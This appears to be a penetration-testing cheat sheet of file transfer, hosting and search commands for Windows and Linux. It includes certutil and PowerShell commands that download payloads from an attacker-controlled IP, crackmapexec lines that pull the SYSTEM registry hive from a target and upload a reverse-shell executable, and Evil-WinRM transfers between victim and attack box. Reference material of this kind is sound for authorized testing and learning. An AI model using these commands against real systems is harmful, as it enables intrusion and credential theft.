This page contains useful commands relating to files such as hosting, downloading, and searching for files. These can be useful for transferring payloads or searching for sensitive files.

Downloading and Uploading Files

This section will cover methods to download files on to target machines.

Certutil

certutil.exe -urlcache -f http://<IP>/<FILE> <OUTPUT FILE>

PowerShell

Invoke-WebRequest -URI $URL -OutFile $Path

(New-Object System.Net.WebClient).DownloadFile ($URL, $Path)

Start-BitsTransfer -Source $URL -Destination $Path

Curl

curl <URL> -o <FILENAME>

Crackmapexec

crackmapexec <PROTOCOL> <IP> -u <ACCOUNT> -p <PASSWORD> -d <DOMAIN> --get-file "C:\windows.old\windows\System32\SYSTEM" SYSTEM

crackmapexec <PROTOCOL <IP> -u <ACCOUNT> -p <PASSWORD> -d <DOMAIN> --put-file /tmp/reverse-shell.exe "C:\Users\ACCOUNT\Documents\reverse-shell.exe"

Evil-WinRM

Getting a file from victim to attack box:

download <FILE>

Uploading a file (supply absolute path is not in directory you spawn the Evil-WinRM session from) from attack box to victim:

upload <FILE>

Hosting Files

This section covers how to host files for download from your attack box or how to host files from a victim machine.

Python

python3 -m http.server <PORT>

Web Servers

After compromising a machine you might be able to serve files in an exisiting public directory. This could be something like using C:\inetpub if there is an IIS server running.

File Searching

This section contains some commands are are useful for searching a file system.

Windows Command Prompt

dir /s/b <FILE>

tree /f /a

PowerShell

Get-ChildItem -Path <PATH> -Filter <FILE> -Recurse -ErrorAction SilentlyContinue

Bash

find <DIR> -name <FILENAME>

The following command will find world readable files:

find <DIR> -perm -o=r

locate -i winpeas.*